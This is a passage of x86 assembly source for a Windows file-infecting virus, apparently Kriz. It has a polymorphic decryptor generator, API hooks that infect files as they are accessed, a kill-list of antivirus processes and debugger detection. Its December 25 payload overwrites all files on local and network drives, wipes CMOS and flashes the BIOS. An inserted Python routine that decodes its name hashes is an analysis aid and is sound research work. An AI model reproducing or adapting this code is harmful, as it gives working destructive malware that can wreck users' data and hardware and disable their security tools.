MOV AL, [EBP+(POP_Reg32-START)+EBX]
STOSB
CALL Get_Free_Reg
XCHG EDX, EAX
CALL Add_Garbage
MOV AL, [EBP+(MOV_Reg32-START)+EDX] ; MOV Cntr_Reg
STOSB
MOV AX, Virus_Size
STOSD
CALL Add_Garbage
MOV [EBP+(Decrypt_Loop-START)], EDI
CALL Add_Garbage
MOV AL, 0FFh
CALL Get_Random
JP Construct_XOR ; 1/2 chance of including DS:
MOV AL, 3Eh ; DS:
STOSB
Construct_XOR: MOV AL, 80h
STOSB
MOV AL, [EBP+(XOR_Ptr_Reg32-START)+EBX]
STOSB
MOV [EBP+(Patch_Delta-START)], EDI
MOV AX, Virus_Size-1
STOSD
Get_Random_Key: CALL Get_Random
OR AL, AL
JZ Get_Random_Key
STOSB
PUSH EAX
CALL Add_Garbage
MOV AL, [EBP+(DEC_Reg32-START)+EBX]
STOSB
CALL Add_Garbage
MOV AL, [EBP+(DEC_Reg32-START)+EDX]
STOSB
MOV AL, 75h ; JNZ
STOSB
MOV EAX, EDI
SUB EAX, 12345678h
Decrypt_Loop = DWORD PTR $-4
NOT EAX
STOSB
POP EDX
MOV EAX, EDI
SUB EAX, ESI
ADD DS:[12345678h], EAX
Patch_Delta = DWORD PTR $-4
MOV EAX, EDI ; Calculate size decryptor.
SUB EAX, [ESP+(7*4)]
CMP EAX, 140 ; Too large? Start over then.
JNB Gen_Decryptor
CMP AL, 120 ; Too small? Ditto.
JB Gen_Decryptor
PUSH EDI
MOV ESI, EBP
MOV CX, Virus_Size
REP MOVSB
ADD EAX, [ESP+(7*4)] ; EDX at entry.
MOV [EBP+(New_Virus_RVA-START)], EAX
MOV [EDI+(Virus_RVA-START)-Virus_Size], EAX
POP EAX
SUB EAX, [EBP+(Patch_Delta-START)]
SUB EAX, 4
NEG EAX
MOV [EDI+(Patch_Decrypt-START)-Virus_Size], EAX
MOV [EDI+(Busy_Switch-START)-Virus_Size], CL
MOV WORD PTR [EDI+(Unicode_Switch-START)-Virus_Size], 90ACh
MOV [EDI+(Delay_Timer-START)-Virus_Size], CL
MOV BYTE PTR [EDI+(Init_Mode-START)-Virus_Size], (CALL_Setup_SEH-Init_Mode) - 1
CMP [EBP+(Infect_Mode-START)], CL
JNZ POP_New_EIP
MOV [EDI+(Init_Mode-START)-Virus_Size], CL
POP_New_EIP: POP DWORD PTR [EDI+(Host_EIP-START)-Virus_Size]
MOV ECX, Virus_Size
Encrypt_Virus: DEC EDI
XOR [EDI], DL
LOOP Encrypt_Virus
POPAD
RET
Add_Garbage:
PUSH 8
POP EAX
CALL Get_Random
INC EAX
XCHG ECX, EAX
Add_Junk: PUSH ECX
PUSH 5
POP EAX
CALL Get_Random
JZ End_Junk_Loop
DEC EAX
JZ Junk_ADD_Reg32
DEC EAX
JZ Junk_DEC_Reg32
Junk_MOV_Reg32: CALL Get_Free_Reg
MOV AL, [EBP+(MOV_Reg32-START)+EAX]
STOSB
MOV EAX, ESP
CALL Get_Random
STOSD
JMP End_Junk_Loop
Junk_DEC_Reg32: CALL Get_Free_Reg
MOV AL, [EBP+(DEC_Reg32-START)+EAX]
STOSB
JMP End_Junk_Loop
Junk_ADD_Reg32: MOV AL, 81h
STOSB
CALL Get_Free_Reg
MOV AL, [EBP+(ADD_Reg32-START)+EAX]
STOSB
MOV EAX, ESP
CALL Get_Random
STOSD
End_Junk_Loop: POP ECX
LOOP Add_Junk
XOR EAX, EAX
RET
Get_Free_Reg:
PUSH 7
POP EAX
CALL Get_Random
CMP EAX, EBX
JE Get_Free_Reg
CMP EAX, EDX
JE Get_Free_Reg
RET
Align_EAX:
XOR EDX, EDX
DIV ECX
OR EDX, EDX
JZ Calc_Aligned
INC EAX
Calc_Aligned: MUL ECX
RET
Get_Delta:
CALL Get_EIP
Get_EIP: POP EBP
SUB EBP, (Get_EIP-START)
RET
Hook_CopyFileA:
MOV AL, ixCopyFileA
JMP Main_Dispatch
Hook_CreateFileA:
MOV AL, ixCreateFileA
JMP Main_Dispatch
Hook_CreateProcessA:
MOV AL, ixCreateProcessA
JMP Main_Dispatch
Hook_DeleteFileA:
MOV AL, ixDeleteFileA
JMP Main_Dispatch
Hook_GetFileAttributesA:
MOV AL, ixGetFileAttributesA
JMP Main_Dispatch
Hook_MoveFileA:
MOV AL, ixMoveFileA
JMP Main_Dispatch
Hook_MoveFileExA:
MOV AL, ixMoveFileExA
JMP Main_Dispatch
Hook_SetFileAttributesA:
MOV AL, ixSetFileAttributesA
JMP Main_Dispatch
Hook_CopyFileW:
MOV AL, ixCopyFileW
JMP Main_Dispatch
Hook_CreateFileW:
MOV AL, ixCreateFileW
JMP Main_Dispatch
Hook_CreateProcessW:
MOV AL, ixCreateProcessW
JMP Main_Dispatch
Hook_DeleteFileW:
MOV AL, ixDeleteFileW
JMP Main_Dispatch
Hook_GetFileAttributesW:
MOV AL, ixGetFileAttributesW
JMP Main_Dispatch
Hook_MoveFileW:
MOV AL, ixMoveFileW
JMP Main_Dispatch
Hook_MoveFileExW:
MOV AL, ixMoveFileExW
JMP Main_Dispatch
Hook_SetFileAttributesW:
MOV AL, ixSetFileAttributesW
Main_Dispatch: PUSH ESI
PUSH EBP
AND EAX, 000000FFh
CALL Get_Delta
JMP $
Busy_Switch = BYTE PTR $-1
; Set busy-flag to prevent re-entrancy.
MOV BYTE PTR [EBP+(Busy_Switch-START)], (Do_Old_Handler-Busy_Switch) - 1
; LODSB / NOP
MOV WORD PTR [EBP+(Unicode_Switch-START)], 90ACh
CMP AL, 08 ; Unicode function?
JB Do_Infect
; LODSW
MOV WORD PTR [EBP+(Unicode_Switch-START)], 0AD66h
Do_Infect: MOV ESI, [ESP+(3*4)] ; Infect the sucker.
CALL Infect_File
; Clear busy-flag.
MOV [EBP+(Busy_Switch-START)], AH
Do_Old_Handler: MOV EAX, [EBP+(API_Addresses-START)+(EAX*4)]
SUB EBP, [EBP+(Virus_RVA-START)]
ADD EAX, EBP
POP EBP
POP ESI
JMP EAX ; JMP to the original API.
Perform_API:
PUSH 0
Work_API_Index = BYTE PTR $-1
POP EAX
CMP [EBP+(Init_Mode-START)], AH
MOV EAX, [EBP+(API_Addresses-START)+(EAX*4)]
JZ Calc_K32_Base
Use_Init_Base: ADD EAX, 12345678h
K32_Base = DWORD PTR $-4
JMP EAX
Calc_K32_Base: ADD EAX, EBP
SUB EAX, [EBP+(Virus_RVA-START)]
JMP EAX
; ESI = ASCIIZ. Returns AX = low word of a reflected CRC-32 (polynomial
; 0EDB88320h, seed 0FFFFFFFFh, no final inversion); the full 32-bit value
; is left in EAX. "CRC16" is just the truncation.
Calculate_CRC16:
PUSH EDX
PUSH ESI
PUSH 0FFFFFFFFh
POP EDX
CLD
Load_Character: LODSB
OR AL, AL
JZ Exit_Calc_CRC
XOR DL, AL
MOV AL, 8
CRC_Byte: SHR EDX, 1
JNC Loop_CRC_Byte
XOR EDX, 0EDB88320h
Loop_CRC_Byte: DEC AL
JNZ CRC_Byte
JMP Load_Character
Exit_Calc_CRC: XCHG EDX, EAX
POP ESI
POP EDX
RET
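; Added example (not part of the virus source): the routine above in Python,
; bit for bit, plus a resolver that maps the 16-bit values in Hook_API_CRC,
; Work_API_CRC and Kill_Table back to names. Because only the low word of the
; CRC-32 is kept, the resolver returns every dictionary name that produces a
; value, not just the first; the name lists are the ones in this listing.

```python
"""Resolve the 16-bit name hashes in Hook_API_CRC, Work_API_CRC and Kill_Table.

Added example, not code from the virus listing.  Calculate_CRC16 is a
reflected CRC-32 (polynomial 0EDB88320h, seed 0FFFFFFFFh, no final
inversion) of which only the low word is stored, so it equals
zlib.crc32(name) ^ 0xFFFFFFFF truncated to 16 bits.  kriz_crc32() follows
the assembly bit by bit; resolve_hashes() maps values pulled from a sample
back to names from a dictionary and keeps every candidate, because a
16-bit hash can collide.  The name lists below are copied from the listing.
"""
import zlib

HOOK_API = ["CopyFileA", "CreateFileA", "CreateProcessA", "DeleteFileA",
            "GetFileAttributesA", "MoveFileA", "MoveFileExA", "SetFileAttributesA",
            "CopyFileW", "CreateFileW", "CreateProcessW", "DeleteFileW",
            "GetFileAttributesW", "MoveFileW", "MoveFileExW", "SetFileAttributesW"]
KILL_TABLE = ["_AVP32.EXE", "_AVPCC.EXE", "_AVPM.EXE", "ALERTSVC.EXE", "AMON.EXE",
              "AVP32.EXE", "AVPCC.EXE", "AVPM.EXE", "N32SCANW.EXE", "NAVAPSVC.EXE",
              "NAVAPW32.EXE", "NAVLU32.EXE", "NAVRUNR.EXE", "NAVW32.EXE", "NAVWNT.EXE",
              "NOD32.EXE", "NPSSVC.EXE", "NRESQ32.EXE", "NSCHED32.EXE", "NSCHEDNT.EXE",
              "NSPLUGIN.EXE", "SCAN.EXE", "SMSS.EXE"]


def kriz_crc32(name):
    """EDX as Calculate_CRC16 leaves it before truncation, for an ASCII name."""
    crc = 0xFFFFFFFF                              # PUSH 0FFFFFFFFh / POP EDX
    for byte in name.encode("ascii"):             # LODSB until the NUL
        crc ^= byte                               # XOR DL, AL
        for _ in range(8):                        # MOV AL, 8 ... DEC AL / JNZ
            if crc & 1:                           # SHR EDX, 1 / JNC
                crc = (crc >> 1) ^ 0xEDB88320
            else:
                crc >>= 1
    return crc                                    # no final NOT, unlike zlib


def kriz_hash(name):
    """The 16-bit value the tables actually hold (AX)."""
    return kriz_crc32(name) & 0xFFFF


def matches_zlib(name):
    """Cross-check against the standard CRC-32: only the final inversion differs."""
    return kriz_crc32(name) == zlib.crc32(name.encode("ascii")) ^ 0xFFFFFFFF


def resolve_hashes(hashes, dictionary):
    """Map each 16-bit hash to every dictionary name that produces it."""
    by_hash = {}
    for name in dictionary:
        by_hash.setdefault(kriz_hash(name), []).append(name)
    return {h: by_hash.get(h, []) for h in hashes}


if __name__ == "__main__":
    for name in HOOK_API + KILL_TABLE:
        print(f"{kriz_hash(name):04X}  {name}")
```

; To recover names from another sample of the family, dump its tables as a
; list of 16-bit values and call resolve_hashes() with a dictionary of
; KERNEL32 exports and known process names.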
; Activates the payload if the current date is
; December 25th or when Soft-Ice is detected.
Check_For_Payload:
PUSHAD
; Try to detect the presence of Soft-Ice
; version 3.xx & 4.xx (9x/NT).
XOR EBX, EBX
PUSH EBX ; Soft-Ice's 9x driver is
PUSH EBX ; present?
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH EBX
CALL @6
DB '\\.\SICE', 0
@6: PUSH ixCreateFileA
INT 03h
INC EAX ; Immediate retaliation!
JNZ Payload
PUSH EBX ; Soft-Ice's NT driver is
PUSH EBX ; present?
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH EBX
CALL @7
DB '\\.\NTICE', 0
@7: PUSH ixCreateFileA
INT 03h
INC EAX ; Immediate retaliation!
JNZ Payload
MOV ESI, (Local_Time-Virus_End)
ADD ESI, [EBP+(Global_Handle-START)]
PUSH ESI
PUSH ixGetLocalTime
INT 03h
CMP BYTE PTR [ESI.Current_Month], 12
JNE Exit_Check_PL
CMP BYTE PTR [ESI.Current_Day], 25
JNE Exit_Check_PL
; Most likely we aren't yet connected to the network, so wait a while
; before destroying: Delay_Timer counts hooked API calls on this date
; and the payload fires when it wraps around after 256 of them.
INC BYTE PTR [EBP+(Delay_Timer-START)]
JZ Payload
Exit_Check_PL: POPAD
RET
Delay_Timer DB 0
; Let's get ready to r0ck..
Payload:
CALL Setup_Nuke_SEH
CALL Get_Delta
XOR EBX, EBX
MOV ESP, [ESP+(2*4)]
JMP Rest_Nuke_SEH
Setup_Nuke_SEH: PUSH DWORD PTR FS:[EBX]
MOV FS:[EBX], ESP
PUSH EAX ; Obtain IDT.
SIDT [ESP-2]
POP EAX
; Our ring-0 INT exception-handler.
LEA ECX, [EBP+(Ring0_Handler-START)]
XCHG [EAX+(3*8)], CX ; Set our own ring-0 handler.
ROR ECX, 16
XCHG [EAX+(3*8)+6], CX
INT 03h ; Raise ring-0 exception.
MOV [EAX+(3*8)+6], CX ; Restore original handler.
ROR ECX, 16
MOV [EAX+(3*8)], CX
Rest_Nuke_SEH: POP DWORD PTR FS:[EBX] ; Restore original SEH.
POP EAX
MOV EDI, [EBP+(Global_Handle-START)] ; Kill-list.
PUSH EDI
CALL @8 ; Load network-library.
DB 'MPR', 0
@8: PUSH ixLoadLibraryA
INT 03h
XCHG ECX, EAX ; Error?
JECXZ JECXZ_Enum_L
MOV EBX, ECX ; Save base in EBX.
CALL @9
DB 'WNetOpenEnumA', 0
@9: PUSH EBX
PUSH ixGetProcAddress
INT 03h
XCHG ECX, EAX
JECXZ Enum_Locals
MOV [EBP+(WNetOpenEnumA-START)], ECX
CALL @10
DB 'WNetEnumResourceA', 0
@10: PUSH EBX
PUSH ixGetProcAddress
INT 03h
XCHG ECX, EAX
JECXZ_Enum_L: JECXZ Enum_Locals
MOV [EBP+(WNetEnumResourceA-START)], ECX
CALL @11 ; Retrieve a find handle
Enum_Handle DD 0 ; to the system root.
@11: PUSH 0
PUSH 0
PUSH RESOURCETYPE_DISK
PUSH RESOURCE_CONNECTED
CALL [EBP+(WNetOpenEnumA-START)]
OR EAX, EAX
JNZ Enum_Locals
; Enumerate all active network-connections.
Retrieve_Enum: LEA ESI, [EBP+(Net_Resource-START)]
CALL @12
Buffer_Size DD 666
@12: PUSH ESI
CALL @13
Enum_Count DD 1
@13: PUSH DWORD PTR [EBP+(Enum_Handle-START)]
CALL [EBP+(WNetEnumResourceA-START)]
OR EAX, EAX
JNZ Enum_Locals
MOV ESI, [ESI+(5*4)] ; Found remote name.
CLD
Copy_Target: LODSB ; Copy the remote name to
STOSB ; our kill-list.
OR AL, AL ; Did the entire ASCIIZ ?
JNZ Copy_Target
JMP Retrieve_Enum
Enum_Locals: POP ESI ; Array of network-drives.
PUSH EDI ; Append local drives.
PUSH 256
PUSH ixGetLogicalDriveStringsA
INT 03h
Drive_Loop: PUSH ESI ; What kind of disk is this?
PUSH ixGetDriveTypeA
INT 03h
CMP AL, DRIVE_REMOVABLE ; Skip floppy-drives.
JE Find_Next_Str
CMP AL, DRIVE_CDROM ; Skip CD-ROM's.
JE Find_Next_Str
CMP AL, DRIVE_RAMDISK ; Skip RAM-disks.
JE Find_Next_Str
CALL_Trash_Dir: CALL Trash_Directory ; Trash the root including
; all its sub-directories.
Find_Next_Str: CLD ; Fetch next byte.
LODSB
OR AL, AL ; Found the end of ASCIIZ ?
JNZ Find_Next_Str
CMP [ESI], AL
JNZ Drive_Loop ; Thank you DRIVE through :P
JMP $ ; Heart stops..
;-----------------------------------
; Overwrites all bytes in all files
; in all directories on all drives.
;-----------------------------------
Trash_Directory:
PUSHAD
SUB ESP, (318+260+2) ; Reserve space on the stack,
; note that ESP must always
; point to a DWORD boundary.
LEA EAX, [ESP+318] ; Save our current directory.
PUSH EAX
PUSH 260
PUSH ixGetCurrentDirectoryA
INT 03h
CMP EAX, 260 ; Too big for our buffer?
JA JNZ_Exit_Trash
XCHG ECX, EAX ; Or the function failed?
JECXZ JNZ_Exit_Trash
PUSH ESI ; Change to found directory.
PUSH ixSetCurrentDirectoryA
INT 03h
DEC EAX ; Argh! something went wrong!
JNZ_Exit_Trash: JNZ Exit_Trash_Dir
XCHG EBX, EAX ; EBX = 0.
PUSH ESP ; Find us a victim.
CALL @14
DB '*.*', 0 ; Kill 'em all!
@14: PUSH ixFindFirstFileA
INT 03h
MOV EDI, EAX
INC EAX
JZ Close_Find
Destroy_Loop: LEA ESI, [ESP.FFN_File_Name]
; Is it a directory?
TEST BYTE PTR [ESP.File_Attributes], 00010000b
JZ Trash_File
CMP WORD PTR [ESI], '.' ; Skip '.'...
JE Find_Next_Crap
CMP WORD PTR [ESI], '..' ; and '..'.
JNE Do_Trash_Dir
CMP [ESI+2], BL ; /0.
JZ Find_Next_Crap
Do_Trash_Dir: CALL Trash_Directory
JMP Find_Next_Crap
Trash_File: PUSH FILE_ATTRIBUTE_NORMAL ; Clear all its attributes.
PUSH ESI
PUSH ixSetFileAttributesA
INT 03h
XCHG ECX, EAX
JECXZ Find_Next_Crap
PUSH EBX ; Open the target.
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
PUSH ESI
PUSH ixCreateFileA
INT 03h
MOV ESI, EAX
INC EAX
JZ Find_Next_Crap
PUSH EBX ; Get its filesize.
PUSH ESI
PUSH ixGetFileSize
INT 03h
; OK, time to say your prayers..
PUSH EBX ; Nuke the S.O.B.
CALL @15
DD 0DEADBEEFh
@15: PUSH EAX
PUSH 444444h
PUSH ESI
PUSH ixWriteFile
INT 03h
; Wasted, time to seal the tomb..
PUSH ESI
PUSH ixCloseHandle
INT 03h
Find_Next_Crap: PUSH ESP
PUSH EDI
PUSH ixFindNextFileA
INT 03h
DEC EAX
JZ Destroy_Loop
Close_Find: PUSH EDI ; Close filehandle.
PUSH ixFindClose
INT 03h
LEA EAX, [ESP+318] ; Restore original directory.
PUSH EAX
PUSH ixSetCurrentDirectoryA
INT 03h
Exit_Trash_Dir: ADD ESP, (318+260+2) ; Clean-up our stackspace.
POPAD
RET
;-------------------------------------------------------
; Overwrite CMOS and attempt to flash the BIOS chipset.
;-------------------------------------------------------
Ring0_Handler:
PUSHFD
PUSHAD
CLI
MOV CL, 64 ; Take all 64 bytes of CMOS.
Nuke_CMOS_Byte: DEC CL ; Done them all?
JS Nuke_BIOS
MOV AL, CL ; Request I/O to byte CL.
OUT 70h, AL
XOR AL, AL ; Trash the byte.
OUT 71h, AL
JMP Nuke_CMOS_Byte ; Repeat until all is done.
; BIOS-flasher taken from CIH. The PCI config writes below (port 0CF8h,
; address 8000384Ch) address bus 0, device 7, function 0, i.e. the PIIX
; southbridge of Intel boards of that era, and the 5555h/2AAAh sequence
; is the JEDEC flash command protocol; other chipsets are not handled.
; I have fully commented Pascal sources of how to flash
; Intel and other boards, available on request.
Nuke_BIOS: ; Show BIOS Page in 000E0000 - 000EFFFF (64k).
MOV EDI, 8000384Ch
MOV BP, 0CF8h
MOV DX, 0CFEh
CALL IOForEEPROM
; Show BIOS Page in 000F0000 - 000FFFFF (64k).
MOV DI, 0058h
DEC EDX
MOV WORD PTR [EBP+(Switch-START)], 0F24h ; AND AL, 0Fh
CALL IOForEEPROM
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ), and  *
; * make that section   *
; * of the Extra BIOS   *
; * writable...         *
; ***********************
MOV EAX, 0E5555h
MOV ECX, 0E2AAAh
CALL EnableEEPROMToWrite
MOV BYTE PTR [EAX], 60h
PUSH ECX
LOOP $
; Destroy BIOS Extra ROM Data in 000E0000h - 000E007Fh, (80h bytes).
XOR AH, AH
MOV WORD PTR [EAX], 'RI' ; Dare yew go TU :P
XCHG ECX, EAX
LOOP $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data  *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) to be    *
; * writable...         *
; ***********************
MOV EAX, 0F5555h
POP ECX
MOV CH, 0AAh
CALL EnableEEPROMToWrite
MOV BYTE PTR [EAX], 20h
LOOP $
; Destroy BIOS Main ROM Data in 000FE000h - 000FE07Fh (80h bytes).
MOV AH, 0E0h
MOV [EAX], AL
; Hide BIOS Page in 000F0000 - 000FFFFF (64k).
MOV WORD PTR [EBP+(Switch-START)], 100Ch ; or al,10h
CALL IOForEEPROM
POPAD
POPFD
IRETD
; Enable EEPROM to Write.
EnableEEPROMToWrite:
MOV [EAX], CL
MOV [ECX], AL
MOV BYTE PTR [EAX], 80h
MOV [EAX], CL
MOV [ECX], AL
RET
; I/O for EEPROM.
IOForEEPROM:
XCHG EDI, EAX
XCHG EDX, EBP
OUT DX, EAX
XCHG EDI, EAX
XCHG EDX, EBP
IN AL, DX
OR AL, 44h
Switch = WORD PTR $-2
XCHG EDI, EAX
XCHG EDX, EBP
OUT DX, EAX
XCHG EDI, EAX
XCHG EDX, EBP
OUT DX, AL
RET
; Returns random number between 0 and EAX-1.
Get_Random:
PUSHAD
XCHG EBX, EAX
PUSH ixGetTickCount
INT 03h
RCL EAX, 2
ADD EAX, 12345678h
Random_Seed = DWORD PTR $-4
ADC EAX, ESP
XOR EAX, ECX
XOR [EBP+(Random_Seed-START)], EAX
ADD EAX, [ESP-(13*4)]
RCL EAX, 1
XOR EDX, EDX
DIV EBX
ADD [EBP+(Random_Seed-START)], EDX
MOV [ESP+(7*4)], EDX
POPAD
OR EAX, EAX
RET
KERNEL32_Name DB '\KERNEL32.DLL', 0
Infected_K32 DB '\KRIZED.TT6', 0
API_Addresses: DD (Work_API_Count + Hook_API_Count) DUP(0)
Hook_Exports: DD Hook_API_Count DUP(0)
; EAX EBX ECX EDX ESI EDI EBP
ADD_Reg32: DB 0C0h, 0C3h, 0C1h, 0C2h, 0C6h, 0C7h, 0C5h
POP_Reg32: DB 058h, 05Bh, 059h, 05Ah, 05Eh, 05Fh, 05Dh
DEC_Reg32: DB 048h, 04Bh, 049h, 04Ah, 04Eh, 04Fh, 04Dh
MOV_Reg32: DB 0B8h, 0BBh, 0B9h, 0BAh, 0BEh, 0BFh, 0BDh
XOR_Ptr_Reg32 DB 0B0h, 0B3h, 0B1h, 0B2h, 0B6h, 0B7h, 0B5h
PUSH_Reg32: DB 050h, 053h, 051h, 052h, 056h, 057h, 055h
; ESP CS DS ES SS FLAGS
PUSH_Reg16_32 DB 054h, 00Eh, 01Eh, 006h, 016h, 09Ch
; API which we hook in order to intercept file-access.
Hook_API_CRC: CRC16 <CopyFileA>
CRC16 <CreateFileA>
CRC16 <CreateProcessA>
CRC16 <DeleteFileA>
CRC16 <GetFileAttributesA>
CRC16 <MoveFileA>
CRC16 <MoveFileExA>
CRC16 <SetFileAttributesA>
CRC16 <CopyFileW>
CRC16 <CreateFileW>
CRC16 <CreateProcessW>
CRC16 <DeleteFileW>
CRC16 <GetFileAttributesW>
CRC16 <MoveFileW>
CRC16 <MoveFileExW>
CRC16 <SetFileAttributesW>
; API which we need in order to function.
Work_API_CRC: CRC16 <CloseHandle>
CRC16 <CreateFileMappingA>
CRC16 <FindClose>
CRC16 <FindFirstFileA>
CRC16 <FindNextFileA>
CRC16 <GetCurrentDirectoryA>
CRC16 <GetDriveTypeA>
CRC16 <GetFileSize>
CRC16 <GetFileTime>
CRC16 <GetLastError>
CRC16 <GetLocalTime>
CRC16 <GetLogicalDriveStringsA>
CRC16 <GetProcAddress>
CRC16 <GetSystemDirectoryA>
CRC16 <GetTickCount>
CRC16 <GetWindowsDirectoryA>
CRC16 <GlobalAlloc>
CRC16 <GlobalFree>
CRC16 <LoadLibraryA>
CRC16 <MapViewOfFile>
CRC16 <SetCurrentDirectoryA>
CRC16 <SetFileTime>
CRC16 <UnmapViewOfFile>
CRC16 <WriteFile>
CRC16 <WritePrivateProfileStringA>
End_Work_API_CRC:
Dispatch_API: ; ANSI.
DW (Hook_CopyFileA-START)
DW (Hook_CreateFileA-START)
DW (Hook_CreateProcessA-START)
DW (Hook_DeleteFileA-START)
DW (Hook_GetFileAttributesA-START)
DW (Hook_MoveFileA-START)
DW (Hook_MoveFileExA-START)
DW (Hook_SetFileAttributesA-START)
; Unicode.
DW (Hook_CopyFileW-START)
DW (Hook_CreateFileW-START)
DW (Hook_CreateProcessW-START)
DW (Hook_DeleteFileW-START)
DW (Hook_GetFileAttributesW-START)
DW (Hook_MoveFileW-START)
DW (Hook_MoveFileExW-START)
DW (Hook_SetFileAttributesW-START)
; Kill-table (CRC16 of process names): McAfee, AVP, NAV and NOD32
; components; SMSS.EXE, the NT session manager, is listed as well.
Kill_Table: CRC16 <_AVP32.EXE>
CRC16 <_AVPCC.EXE>
CRC16 <_AVPM.EXE>
CRC16 <ALERTSVC.EXE>
CRC16 <AMON.EXE>
CRC16 <AVP32.EXE>
CRC16 <AVPCC.EXE>
CRC16 <AVPM.EXE>
CRC16 <N32SCANW.EXE>
CRC16 <NAVAPSVC.EXE>
CRC16 <NAVAPW32.EXE>
CRC16 <NAVLU32.EXE>
CRC16 <NAVRUNR.EXE>
CRC16 <NAVW32.EXE>
CRC16 <NAVWNT.EXE>
CRC16 <NOD32.EXE>
CRC16 <NPSSVC.EXE>
CRC16 <NRESQ32.EXE>
CRC16 <NSCHED32.EXE>
CRC16 <NSCHEDNT.EXE>
CRC16 <NSPLUGIN.EXE>
CRC16 <SCAN.EXE>
CRC16 <SMSS.EXE>
End_Kill_Table:
DB 'YOU CALL IT RELIGION, YOU''RE FULL OF SHIT', 0Dh
DB 'YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL', 0Dh
DB 'YOU''RE SO FULL OF SHIT, I DON''T WANT TO HEAR IT', 0Dh
DB 'ALL YOU DO IS TALK ABOUT YOURSELF', 0Dh
DB 'I DON''T WANNA HEAR IT, COZ I KNOW NONE OF IT''S TRUE', 0Dh
DB 'I''M SICK AND TIRED OF ALL YOUR GODDAMN LIES', 0Dh
DB 'LIES IN THE NAME OF GOD', 0Dh
DB 'WHEN ARE YOU GOING TO REALIZE THAT I DON''T WANT TO HEAR IT?!', 0Dh
DB 'I KNOW YOU''RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH', 0Dh
DB 'YOU KEEP ON TALKING, TALKING EVERYDAY', 0Dh
DB 'FIRST YOU''RE TELLING STORIES, THEN YOU''RE TELLING LIES', 0Dh
DB 'WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON''T WANT TO HEAR IT!!', 0Dh
DB 'AH, SHUT THE FUCK UP...', 0Dh, 0
Virus_End:
Kill_List_Drives DB 256 DUP(0)
Net_Resource:
Clean_K32_Path DB 260 DUP(0)
Infected_K32_Path DB 260 DUP(0)
ANSI_Target_File DB 260 DUP(0)
Time_Creation DD 0
WNetOpenEnumA DD 0
Time_Last_Access DD 0
WNetEnumResourceA DD 0
Time_Last_Write DD 0
DD 0
Local_Time DW 8 DUP(0)
End_Heap:
Stupid_Dummy DB 0
POLY_START:
PUSH EAX ; This is where the host's
; VA address is placed.
PUSHFD ; Save all registers & flags.
PUSHAD
CALL @16 ; Check for the author's
DB 'C:\VIRUS.TIR', 0 ; inoculation-file (the author
@16: CALL GetFileAttributesA ; runs Soft-Ice on that box).
INC EAX ; Not there: this isn't the
JZ START ; author's machine, go for it.
INT 01h ; It is: trap into the debugger
NOP ; and hang instead.
JMP $
Carrier:
PUSH 10h
CALL @17
DB 'Error!', 0
@17: CALL @18
DB 'Failed to initialize GRAPH32.DLL', 0
@18: PUSH 0
CALL MessageBoxA
PUSH 0 ; Back to the beast...
CALL ExitProcess
; The good old MZ-header...
MZ_Header STRUC
MZ_Mark DW 0
MZ_Image_Mod_512 DW 0
MZ_Image_512_Pages DW 0
MZ_Reloc_Items DW 0
MZ_Header_Size_Mem DW 0
MZ_Min_Size_Mem DW 0
MZ_Max_Size_Mem DW 0
MZ_Program_SS DW 0
MZ_Program_SP DW 0
MZ_Checksum DW 0
MZ_Program_IP DW 0
MZ_Program_CS DW 0
MZ_Reloc_Table DW 0
MZ_Header ENDS
PE_Header STRUC
PE_Mark DD 0 ; PE-marker (PE/0/0).
CPU_Type DW 0 ; Minimal CPU required.
Object_Count DW 0 ; Number of sections in PE.
PE_Date_Time DD 0 ; Date/time PE was built.
Reserved_1 DD 0
DD 0
NT_Header_Size DW 0
PE_Flags DW 0
DD 4 DUP(0)
EIP_RVA DD 0
DD 2 DUP(0)
Image_Base DD 0
Object_Align DD 0
File_Align DD 0
DW 0, 0
DW 0, 0
DW 0, 0
PE_Reserved_5 DD 0
Image_Size DD 0
Headers_Size DD 0
PE_Checksum DD 0
DW 0
DLL_Flags DW 0
PE_Header ENDS
Section_Header STRUC
Section_Name DB 8 DUP(0) ; Zero-padded section-name.
Section_Virtual_Size DD 0 ; Memory-size of section.
Section_RVA DD 0 ; Start section in memory.
Section_Physical_Size DD 0 ; Section-size in file.
Section_Physical_Offset DD 0 ; Section file-offset.
Section_Reserved_1 DD 0 ; Not used for executables.
Section_Reserved_2 DD 0 ; Not used for executables.
Section_Reserved_3 DD 0 ; Not used for executables.
Section_Flags DD 0 ; Flags of the section.
Section_Header ENDS
Find_First_Next_Win32 STRUC
File_Attributes DD 0
Creation_Time DD 0, 0
Last_Accessed_Time DD 0, 0
Last_Written_Time DD 0, 0
Find_File_Size_High DD 0
Find_File_Size_Low DD 0
Find_Reserved_1 DD 0
Find_Reserved_2 DD 0
FFN_File_Name DB 260 DUP(0)
Find_DOS_File_Name DB 14 DUP(0)
Find_First_Next_Win32 ENDS
Date_Time STRUC
Current_Year DW 0
Current_Month DW 0
Current_Day_Of_Week DW 0
Current_Day DW 0
Current_Hour DW 0
Current_Minute DW 0
Current_Second DW 0
Current_Millisecond DW 0
Date_Time ENDS
END POLY_START